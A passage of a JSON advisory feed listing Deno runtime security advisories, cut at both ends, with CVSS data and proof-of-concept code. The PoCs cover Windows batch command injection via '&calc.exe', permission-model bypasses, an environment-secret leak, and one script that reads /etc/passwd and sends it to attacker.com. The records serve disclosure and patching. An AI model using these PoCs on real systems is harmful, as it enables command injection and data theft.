v2.6.8).","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-02-19T20:31:41.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-hmh4-3xvx-q5hr","https://github.com/denoland/deno/commit/9132ad958c83a0d0b199de12b69b877f63edab4c","https://github.com/denoland/deno/releases/tag/v2.6.8","https://nvd.nist.gov/vuln/detail/CVE-2026-27190","https://github.com/advisories/GHSA-hmh4-3xvx-q5hr"],"source_kind":"github","identifiers":["GHSA-hmh4-3xvx-q5hr","CVE-2026-27190"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-02-19T21:00:08.821Z","updated_at":"2026-08-29T17:03:38.071Z","epss_percentage":0.02213,"epss_percentile":0.80508,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1obWg0LTN4dngtcTVocs4ABSmq","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1obWg0LTN4dngtcTVocs4ABSmq","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.6.8","vulnerable_version_range":"\u003c 2.6.8"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1obWg0LTN4dngtcTVocs4ABSmq/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tM2M0LXByaHctbXJ4Ns4ABRLc","url":"https://github.com/advisories/GHSA-m3c4-prhw-mrx6","title":"Deno has an incomplete fix for command-injection prevention on Windows — case-insensitive extension bypass","description":"### Summary\nA prior patch aimed to block spawning Windows batch/shell files by returning an error when a spawned path’s extension matched `.bat` or `.cmd`. That check performs a case-sensitive comparison against lowercase literals and therefore can be bypassed when the extension uses alternate casing (for example `.BAT, .Bat`, etc.).\n\n### POC\n```javascript\nconst command = new Deno.Command('./test.BAT', {\n  args: ['\u0026calc.exe'],\n});\nconst child = command.spawn();\n```\nThis causes `calc.exe` to be launched; see the attached screenshot for evidence.\n\n**Patched in `CVE-2025-61787` — prevents execution of `.bat` and `.cmd` files:**\n![photo_2025-10-10 02 27 23](https://github.com/user-attachments/assets/43df25e2-e2e1-48aa-8060-cb0a22637f1f)\n\n**Bypass of the patched vulnerability:**\n![photo_2025-10-10 02 27 25](https://github.com/user-attachments/assets/2be1afb4-84a1-4883-8e18-6a174fdd3615)\n\n\n### Impact\nThe script launches calc.exe on Windows, demonstrating that passing user-controlled arguments to a spawned batch script can result in command-line injection.\n\n### Mitigation\n\nUsers should update to Deno v2.5.6 or newer.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-01-16T15:49:38.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-m3c4-prhw-mrx6","https://nvd.nist.gov/vuln/detail/CVE-2026-22864","https://github.com/denoland/deno/releases/tag/v2.5.6","https://github.com/advisories/GHSA-m3c4-prhw-mrx6"],"source_kind":"github","identifiers":["GHSA-m3c4-prhw-mrx6","CVE-2026-22864"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-01-16T16:00:08.575Z","updated_at":"2026-09-01T18:04:35.320Z","epss_percentage":0.0063,"epss_percentile":0.4771,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tM2M0LXByaHctbXJ4Ns4ABRLc","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tM2M0LXByaHctbXJ4Ns4ABRLc","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.5.6","vulnerable_version_range":"\u003c 2.5.6"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tM2M0LXByaHctbXJ4Ns4ABRLc/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01Mzc5LWY1aGYtdzM4ds4ABRLb","url":"https://github.com/advisories/GHSA-5379-f5hf-w38v","title":"Deno node:crypto doesn't finalize cipher","description":"### Summary\n\nThe vulnerability allows an attacker to have infinite encryptions. \n\nThis can lead to naive attempts at brute forcing, as well as more refined attacks with the goal to learn the server secrets.\n\n### PoC\n```js\nimport crypto from \"node:crypto\";\n\nconst key = crypto.randomBytes(32);\nconst iv = crypto.randomBytes(16);\nconst cipher = crypto.createCipheriv(\"aes-256-cbc\", key, iv);\ncipher.final()\n\nconsole.log(cipher);\n```\n\n### Expected Output\n```js\nCipheriv {\n  _decoder: null,\n  _options: undefined,\n  Symbol(kHandle): CipherBase {}\n}\n```\n\n### Actual Output\n```js\nCipheriv {\n  _events: {\n    close: undefined,\n    error: undefined,\n    prefinish: [Function: prefinish],\n    finish: undefined,\n    drain: undefined,\n    data: undefined,\n    end: undefined,\n    readable: undefined\n  },\n  _readableState: ReadableState {\n    highWaterMark: 65536,\n    buffer: [],\n    bufferIndex: 0,\n    length: 0,\n    pipes: [],\n    awaitDrainWriters: null,\n    [Symbol(kState)]: 1048844\n  },\n  _writableState: WritableState {\n    highWaterMark: 65536,\n    length: 0,\n    corked: 0,\n    onwrite: [Function: bound onwrite],\n    writelen: 0,\n    bufferedIndex: 0,\n    pendingcb: 0,\n    [Symbol(kState)]: 17580812,\n    [Symbol(kBufferedValue)]: null\n  },\n  allowHalfOpen: true,\n  _final: [Function: final],\n  _maxListeners: undefined,\n  _transform: [Function: transform],\n  _eventsCount: 1,\n  [Symbol(kCapture)]: false,\n  [Symbol(kCallback)]: null\n}\n```\n\n### Mitigations\n\nAll users should upgrade to Deno v2.6.0 or newer.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2026-01-16T15:49:35.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.2,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-5379-f5hf-w38v","https://nvd.nist.gov/vuln/detail/CVE-2026-22863","https://github.com/denoland/deno/releases/tag/v2.6.0","https://github.com/advisories/GHSA-5379-f5hf-w38v"],"source_kind":"github","identifiers":["GHSA-5379-f5hf-w38v","CVE-2026-22863"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-01-16T16:00:08.575Z","updated_at":"2026-08-29T17:03:52.731Z","epss_percentage":0.00199,"epss_percentile":0.09915,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01Mzc5LWY1aGYtdzM4ds4ABRLb","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01Mzc5LWY1aGYtdzM4ds4ABRLb","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.6.0","vulnerable_version_range":"\u003c= 2.5.6"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01Mzc5LWY1aGYtdzM4ds4ABRLb/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tMmdmLXgzZjYtOGhxM84ABNIf","url":"https://github.com/advisories/GHSA-m2gf-x3f6-8hq3","title":"Deno is Vulnerable to Command Injection on Windows During Batch File Execution","description":"### Summary\nDeno versions up to 2.5.1 are vulnerable to Command Line Injection attacks on Windows when batch files are executed.\n\n### Details\nIn Windows, ``CreateProcess()`` always implicitly spawns ``cmd.exe`` if a batch file (.bat, .cmd, etc.) is being executed even if the application does not specify it via the command line. This makes Deno vulnerable to a command injection attack on Windows as demonstrated by the two proves-of-concept below.\n\n### PoC\nUsing `node:child_process` (with the `env` and `run` permissions):\n```JS\nconst { spawn } = require('node:child_process');\nconst child = spawn('./test.bat', ['\u0026calc.exe']);\n```\nUsing `Deno.Command.spawn()` (with the `run` permission):\n```JS\nconst command = new Deno.Command('./test.bat', {\n  args: ['\u0026calc.exe'],\n});\nconst child = command.spawn();\n```\n\n### Impact\nBoth of these scripts result in opening calc.exe on Windows, thus allowing a Command Line Injection attack when user-provided arguments are passed if the script being executed by the child process is a batch script.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-10-08T18:16:24.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-m2gf-x3f6-8hq3","https://nvd.nist.gov/vuln/detail/CVE-2025-61787","https://github.com/denoland/deno/pull/30818","https://github.com/denoland/deno/commit/8a0990ccd37bafd8768176ca64b906ba2da2d822","https://github.com/denoland/deno/releases/tag/v2.2.15","https://github.com/denoland/deno/releases/tag/v2.5.2","https://github.com/advisories/GHSA-m2gf-x3f6-8hq3"],"source_kind":"github","identifiers":["GHSA-m2gf-x3f6-8hq3","CVE-2025-61787"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2025-10-08T19:00:07.546Z","updated_at":"2026-08-29T17:04:29.137Z","epss_percentage":0.02084,"epss_percentile":0.79507,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tMmdmLXgzZjYtOGhxM84ABNIf","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tMmdmLXgzZjYtOGhxM84ABNIf","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.5.2","vulnerable_version_range":"\u003c 2.5.2"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tMmdmLXgzZjYtOGhxM84ABNIf/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1xcTI2LTg0bWgtMjZqOc4ABNIe","url":"https://github.com/advisories/GHSA-qq26-84mh-26j9","title":"Deno's --deny-read check does not prevent permission bypass","description":"### Summary \n\n`Deno.FsFile.prototype.stat` and `Deno.FsFile.prototype.statSync` are not limited by the permission model check `--deny-read=./`.\n\nIt's possible to retrieve stats from files that the user do not have explicit read access to  (the script is executed with `--deny-read=./`)\n\nSimilar APIs like `Deno.stat` and `Deno.statSync` require `allow-read` permission, however, when a file is opened, even with file-write only flags and deny-read permission, it's still possible to retrieve file stats, and thus bypass the permission model.\n\n### PoC\n\nSetup:\n```\ndeno --version\ndeno 2.4.2 (stable, release, x86_64-unknown-linux-gnu)\nv8 13.7.152.14-rusty\ntypescript 5.8.3\n\ntouch test1.txt\n```\n\n- `poc_file.stat.ts`\n```ts\n// touch test1.txt\n// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.stat\n// deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 1\n// deno run --allow-write=./ poc_file.stat.ts 1\nasync function poc1(){\n    using file = await Deno.open(\"./test1.txt\", { read: false, write: true});\n    const fileInfo = await file.stat();\n    console.log(fileInfo.isFile);\n}\n\n// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.statSync\n// deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 2\n// deno run --allow-write=./ poc_file.stat.ts 2\nfunction poc2(){\n    using file = Deno.openSync(\"./test1.txt\", { read: false, write: true});\n    const fileInfo = file.statSync();\n    console.log(fileInfo.isFile);\n}\n\n// https://docs.deno.com/api/deno/~/Deno.stat\n// deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 3\n// deno run --allow-write=./ poc_file.stat.ts 3\nasync function poc3(){\n    // not executed\n    const fileInfo = await Deno.stat(\"./test1.txt\");\n    console.log(fileInfo.isFile);\n}\n\n// https://docs.deno.com/api/deno/~/Deno.statSync\n// deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 4\n// deno run --allow-write=./ poc_file.stat.ts 4\nfunction poc4(){\n    // not executed\n    const fileInfo = Deno.statSync(\"./test1.txt\");\n    console.log(fileInfo.isFile);\n}\n\n\nasync function main(){\n    const poc = Deno.args[0] || 1;\n\n    const status = await Deno.permissions.query({ name: \"read\", path: \"./\" });\n    console.log(status);\n    switch (poc) {\n        case \"1\":\n            poc1()\n            break;\n        case \"2\":\n            poc2()\n            break;\n        case \"3\":\n            poc3()\n            break;\n        case \"4\":\n            poc4()\n            break;\n        default:\n            poc1()\n    }\n}\n\nmain()\n```\n\n\nOutput:\n- `deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 1`\n```\nPermissionStatus { state: \"denied\", onchange: null }\ntrue\n```\n\n- `deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 2`\n```\nPermissionStatus { state: \"denied\", onchange: null }\ntrue\n```\n\n- `deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 3`\n```\nPermissionStatus { state: \"denied\", onchange: null }\nerror: Uncaught (in promise) NotCapable: Requires read access to \"./test1.txt\", run again with the --allow-read flag\n    const fileInfo = await Deno.stat(\"./test1.txt\");\n                                ^\n    ...\n```\n\n- `deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 4`\n```\nPermissionStatus { state: \"denied\", onchange: null }\nerror: Uncaught (in promise) NotCapable: Requires read access to \"./test1.txt\", run again with the --allow-read flag\n    const fileInfo = Deno.statSync(\"./test1.txt\");\n                          ^\n    ...\n```\n\n\n### Impact\n\nPermission model bypass","origin":"UNSPECIFIED","severity":"LOW","published_at":"2025-10-08T17:56:40.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":3.3,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-qq26-84mh-26j9","https://nvd.nist.gov/vuln/detail/CVE-2025-61786","https://github.com/denoland/deno/pull/30876","https://github.com/denoland/deno/commit/1ab2268c0bcbf9b0468e0e36963f77f8c31c73ec","https://github.com/denoland/deno/releases/tag/v2.2.15","https://github.com/denoland/deno/releases/tag/v2.5.3","https://github.com/advisories/GHSA-qq26-84mh-26j9"],"source_kind":"github","identifiers":["GHSA-qq26-84mh-26j9","CVE-2025-61786"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2025-10-08T18:00:06.987Z","updated_at":"2026-08-29T17:04:29.138Z","epss_percentage":0.00182,"epss_percentile":0.07992,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xcTI2LTg0bWgtMjZqOc4ABNIe","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1xcTI2LTg0bWgtMjZqOc4ABNIe","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.5.3","vulnerable_version_range":"\u003c 2.5.3"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xcTI2LTg0bWgtMjZqOc4ABNIe/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12ZzJyLXJtZ3AtY2dxas4ABNF_","url":"https://github.com/advisories/GHSA-vg2r-rmgp-cgqj","title":"Deno's --deny-write check does not prevent permission bypass","description":"### Summary\n\n`Deno.FsFile.prototype.utime` and `Deno.FsFile.prototype.utimeSync` are not limited by the permission model check `--deny-write=./`.\n\nIt's possible to change to change the access (`atime`) and modification (`mtime`) times on the file stream resource even when the file is opened with `read` only permission (and `write`: `false`) and file write operations are not allowed (the script is executed with `--deny-write=./`).\n\nSimilar APIs like `Deno.utime` and `Deno.utimeSync` require `allow-write` permission, however, when a file is opened, even with read only flags and deny-write permission, it's still possible to change the access (`atime`) and modification (`mtime`) times, and thus bypass the permission model.\n\n### PoC\n\nSetup:\n```\ndeno --version\ndeno 2.4.2 (stable, release, x86_64-unknown-linux-gnu)\nv8 13.7.152.14-rusty\ntypescript 5.8.3\n\ntouch test.txt\n```\n\n```js\n// touch test.txt\n// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.utime\n// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 1\nasync function poc1(){\n    using file = await Deno.open(\"./test.txt\", { read: true, write: false});\n\n    const fileInfoBefore = await file.stat();\n    \n    await file.utime(new Date(\"2000-01-01\"), new Date(\"2000-01-01\"));\n    \n    const fileInfoAfter = await file.stat();\n    \n    \n    console.log(`BEFORE (utime)`)\n    console.log(new Date(fileInfoBefore.mtime).getFullYear())\n    console.log(new Date(fileInfoBefore.atime).getFullYear())\n    \n    \n    console.log(`AFTER (utime)`)\n    console.log(new Date(fileInfoAfter.mtime).getFullYear())\n    console.log(new Date(fileInfoAfter.atime).getFullYear())\n}\n\n\n// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.utimeSync\n// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 2\nfunction poc2(){\n    using file = Deno.openSync(\"./test.txt\", { read: true, write: false});\n\n    const fileInfoBefore = file.statSync();\n    \n    file.utimeSync(new Date(\"2001-01-01\"), new Date(\"2001-01-01\"));\n    \n    const fileInfoAfter = file.statSync();\n    \n    \n    console.log(`BEFORE (utimeSync)`)\n    console.log(new Date(fileInfoBefore.mtime).getFullYear())\n    console.log(new Date(fileInfoBefore.atime).getFullYear())\n    \n    \n    console.log(`AFTER (utimeSync)`)\n    console.log(new Date(fileInfoAfter.mtime).getFullYear())\n    console.log(new Date(fileInfoAfter.atime).getFullYear())\n}\n\n// https://docs.deno.com/api/deno/~/Deno.utime\n// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 3\nasync function poc3(){\n    // not executed\n    await Deno.utime(\"./test.txt\", new Date(\"2000-01-01\"), new Date(\"2000-01-01\"));\n}\n\n// https://docs.deno.com/api/deno/~/Deno.utimeSync\n// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 4\nfunction poc4(){\n    // not executed\n    Deno.utimeSync(\"./test.txt\", new Date(\"2000-01-01\"), new Date(\"2000-01-01\"));\n}\n\n\nasync function main(){\n    const poc = Deno.args[0] || 1;\n\n    const status = await Deno.permissions.query({ name: \"write\", path: \"./\" });\n    console.log(status);\n    switch (poc) {\n        case \"1\":\n            poc1()\n            break;\n        case \"2\":\n            poc2()\n            break;\n        case \"3\":\n            poc3()\n            break;\n        case \"4\":\n            poc4()\n            break;\n        default:\n            poc1()\n    }\n}\n\nmain()\n```\n\nOutput:\n- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 1`\n```\nPermissionStatus { state: \"denied\", onchange: null }\nBEFORE (utime)\n2025\n2025\nAFTER (utime)\n2000\n2000\n```\n\n- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 2`\n```\nPermissionStatus { state: \"denied\", onchange: null }\nBEFORE (utimeSync)\n2000\n2000\nAFTER (utimeSync)\n2001\n2001\n```\n\n- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 3`\n```\nPermissionStatus { state: \"denied\", onchange: null }\nerror: Uncaught (in promise) NotCapable: Requires write access to \"./test.txt\", run again with the --allow-write flag\n    await Deno.utime(\"./test.txt\", new Date(\"2000-01-01\"), new Date(\"2000-01-01\"));\n               ^\n    ...\n```\n\n- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 4`\n```\nPermissionStatus { state: \"denied\", onchange: null }\nerror: Uncaught (in promise) NotCapable: Requires write access to \"./test.txt\", run again with the --allow-write flag\n    Deno.utimeSync(\"./test.txt\", new Date(\"2000-01-01\"), new Date(\"2000-01-01\"));\n         ^\n    ...\n```\n\n\n### Impact\n\nPermission model bypass","origin":"UNSPECIFIED","severity":"LOW","published_at":"2025-10-07T22:36:36.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":3.3,"cvss_vector":"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-vg2r-rmgp-cgqj","https://github.com/denoland/deno/pull/30872","https://github.com/denoland/deno/commit/992e998dfe436cdc9325232759af8be92f11739b","https://nvd.nist.gov/vuln/detail/CVE-2025-61785","https://github.com/denoland/deno/releases/tag/v2.2.15","https://github.com/denoland/deno/releases/tag/v2.5.3","https://github.com/advisories/GHSA-vg2r-rmgp-cgqj"],"source_kind":"github","identifiers":["GHSA-vg2r-rmgp-cgqj","CVE-2025-61785"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2025-10-07T23:00:06.474Z","updated_at":"2026-08-29T17:04:29.139Z","epss_percentage":0.00184,"epss_percentile":0.08169,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12ZzJyLXJtZ3AtY2dxas4ABNF_","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12ZzJyLXJtZ3AtY2dxas4ABNF_","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.5.3","vulnerable_version_range":"\u003c 2.5.3"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12ZzJyLXJtZ3AtY2dxas4ABNF_/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qdjR4LWp2M2gtcWZmNc4ABIp0","url":"https://github.com/advisories/GHSA-jv4x-jv3h-qff5","title":"Deno vulnerable to Exposure of Sensitive Information to an Unauthorized Actor","description":"### Summary\n\nStatic imports are exempted from the network permission check. An attacker could exploit this to leak the password file on the network.\n\n### Details\n\nStatic imports in Deno are exempted from the network permission check. This can be exploited by attackers in multiple ways, when third-party code is directly/indirectly executed with `deno run`:\n\n1. The simplest payload would be a tracking pixel-like import that attackers place in their code to find out when developers use the attacker-controlled code.\n2. When `--allow-write` and `--allow-read` permissions are given, an attacker can perform a sophisticated two-steps attack: first, they generate a ts/js file containing a static import and in a second execution load this static file.\n\n### PoC\n\n```ts\nconst __filename = new URL(\"\", import.meta.url).pathname;\nlet oldContent = await Deno.readTextFile(__filename);\nlet passFile = await Deno.readTextFile(\"/etc/passwd\");\nlet pre =\n  'import {foo} from \"[https://attacker.com?val=](https://attacker.com/?val=)' +\n  encodeURIComponent(passFile) + '\";\\n';\nawait Deno.writeTextFile(__filename, pre + oldContent);\n```\n\nExecuting a file containing this payload twice, with `deno run --allow-read --allow-write` would cause the password file to leak on the network, even though no network permission was granted.\n\nThis vulnerability was fixed with the addition of the `--allow-import` flag: https://docs.deno.com/runtime/fundamentals/security/#network-access","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-06-05T01:21:08.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-jv4x-jv3h-qff5","https://github.com/advisories/GHSA-jv4x-jv3h-qff5"],"source_kind":"github","identifiers":["GHSA-jv4x-jv3h-qff5","CVE-2024-21486"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2025-06-05T02:07:58.220Z","updated_at":"2026-08-29T17:05:04.955Z","epss_percentage":0.00842,"epss_percentile":0.75257,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qdjR4LWp2M2gtcWZmNc4ABIp0","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qdjR4LWp2M2gtcWZmNc4ABIp0","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.0.0","vulnerable_version_range":"\u003c 2.0.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qdjR4LWp2M2gtcWZmNc4ABIp0/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04dnhqLTRjcGgtYzU5Ns4ABIpO","url":"https://github.com/advisories/GHSA-8vxj-4cph-c596","title":"Deno has --allow-read / --allow-write permission bypass in `node:sqlite`","description":"## Summary\n\nIt is possible to bypass Deno's read/write permission checks by using `ATTACH DATABASE` statement.\n\n## PoC\n\n```js\n// poc.js\nimport { DatabaseSync } from \"node:sqlite\"\n\nconst db = new DatabaseSync(\":memory:\");\ndb.exec(\"ATTACH DATABASE 'test.db' as test;\");\n\ndb.exec(\"CREATE TABLE test.test (id INTEGER PRIMARY KEY, name TEXT);\");\n```\n\n```\n$ deno poc.js\n```","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-06-04T21:22:27.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.5,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P","references":["https://github.com/denoland/deno/security/advisories/GHSA-8vxj-4cph-c596","https://github.com/denoland/deno/commit/31a97803995bd94629528ba841b2418d3ca01860","https://nvd.nist.gov/vuln/detail/CVE-2025-48935","https://rustsec.org/advisories/RUSTSEC-2025-0138.html","https://github.com/advisories/GHSA-8vxj-4cph-c596"],"source_kind":"github","identifiers":["GHSA-8vxj-4cph-c596","CVE-2025-48935"],"repository_url":"https://github.com/denoland/deno","blast_radius":4.96699492845569,"created_at":"2025-06-04T22:08:12.441Z","updated_at":"2026-08-29T17:05:04.960Z","epss_percentage":0.00436,"epss_percentile":0.36137,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04dnhqLTRjcGgtYzU5Ns4ABIpO","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04dnhqLTRjcGgtYzU5Ns4ABIpO","packages":[{"ecosystem":"cargo","package_name":"deno_node","versions":[{"first_patched_version":"0.134.0","vulnerable_version_range":"\u003e= 0.129.0, \u003c 0.134.0"}],"purl":"pkg:cargo/deno_node"},{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.2.5","vulnerable_version_range":"\u003e= 2.2.0, \u003c 2.2.5"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04dnhqLTRjcGgtYzU5Ns4ABIpO/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03dzhwLWNoeHEtMjc4Oc4ABIpN","url":"https://github.com/advisories/GHSA-7w8p-chxq-2789","title":"Deno.env.toObject() ignores the variables listed in --deny-env and returns all environment variables","description":"### Summary\nThe [Deno.env.toObject](https://docs.deno.com/api/deno/~/Deno.Env.toObject) method ignores any variables listed in the `--deny-env` option of the `deno run` command. When looking at the [documentation](https://docs.deno.com/runtime/fundamentals/security/#environment-variables) of the `--deny-env` option this might lead to a false impression that variables listed in the option are impossible to read.\n\n### PoC\n\n```\nexport AWS_SECRET_ACCESS_KEY=my-secret-aws-key\n\n# Works as expected. The program stops with a \"NotCapable\" error message\necho 'console.log(Deno.env.get(\"AWS_SECRET_ACCESS_KEY\"));' | deno run \\\n  --allow-env \\\n  --deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -\n\n# All enviroment variables are printed and the --deny-env list is completely disregarded\necho 'console.log(Deno.env.toObject());' | deno run \\\n  --allow-env \\\n  --deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -\n```\n\nThe first example using `get` exits with the following error:\n```\nerror: Uncaught (in promise) NotCapable: Requires env access to \"AWS_SECRET_ACCESS_KEY\", run again with the --allow-env flag\nconsole.log(Deno.env.get(\"AWS_SECRET_ACCESS_KEY\"));\n                     ^\n    at Object.getEnv [as get] (ext:deno_os/30_os.js:124:10)\n    at file:///$deno$stdin.mts:1:22\n```\n\nThe second example  using `toObject` prints all environment variables:\n```\n[Object: null prototype] {\n  ...\n  AWS_SECRET_ACCESS_KEY: \"my-secret-aws-key\",\n  ...\n}\n```\n\n### Impact\nSoftware relying on the combination of both flags to allow access to most environment variables except a few sensitive ones will be vulnerable to malicious code trying to steal secrets using the Deno.env.toObject() method.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-06-04T21:18:18.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.5,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P","references":["https://github.com/denoland/deno/security/advisories/GHSA-7w8p-chxq-2789","https://github.com/denoland/deno/pull/29079","https://github.com/denoland/deno/commit/2959e083912420988066a001c2b2d6732a1b562f","https://github.com/denoland/deno/commit/946ccda1aa19a00c478a5e6826b75053b050d753","https://docs.deno.com/api/deno/~/Deno.Env.toObject","https://docs.deno.com/runtime/fundamentals/security/#environment-variables","https://nvd.nist.gov/vuln/detail/CVE-2025-48934","https://github.com/advisories/GHSA-7w8p-chxq-2789"],"source_kind":"github","identifiers":["GHSA-7w8p-chxq-2789","CVE-2025-48934"],"repository_url":"https://github.com/denoland/deno","blast_radius":8.55966375422008,"created_at":"2025-06-04T22:08:12.484Z","updated_at":"2026-09-01T18:05:58.789Z","epss_percentage":0.00396,"epss_percentile":0.3251,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03dzhwLWNoeHEtMjc4Oc4ABIpN","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03dzhwLWNoeHEtMjc4Oc4ABIpN","packages":[{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"0.212.0","vulnerable_version_range":"\u003c 0.212.0"}],"purl":"pkg:cargo/deno_runtime"},{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.2.13","vulnerable_version_range":"\u003e= 2.2.0, \u003c 